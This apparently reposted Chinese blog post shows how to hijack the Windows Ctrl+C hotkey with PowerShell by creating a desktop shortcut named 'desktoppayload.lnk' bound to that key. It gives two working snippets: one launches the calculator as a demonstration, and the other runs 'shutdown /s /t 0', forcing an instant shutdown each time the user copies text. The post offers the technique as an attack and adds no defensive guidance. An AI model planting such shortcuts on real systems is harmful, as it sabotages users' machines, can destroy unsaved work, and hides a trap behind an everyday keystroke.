Powershell劫持Windows快捷键

劫持ctrl+c运行scalc.exe:

$WshShell = New-Object -comObject WScript.Shell 
$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk") 
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" 
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" 
$Shortcut.hotkey = "ctrl+c" 
$Shortcut.Arguments = 'calc' 
$Shortcut.Save()


劫持ctrl+c运行shutdown命令:

$WshShell = New-Object -comObject WScript.Shell 
$Shortcut = $WshShell.CreateShortcut("desktop\desktoppayload.lnk") 
$Shortcut.TargetPath = "%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe" 
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" 
$Shortcut.hotkey = "ctrl+c" 
$Shortcut.Arguments = 'shutdown /s /t 0' 
$Shortcut.Save()


2016061423443176956.gif


原文链接:http://jerrygamblin.com/2016/06/12/hijacking-common-windows-shortcuts-with-powershell/

评论回复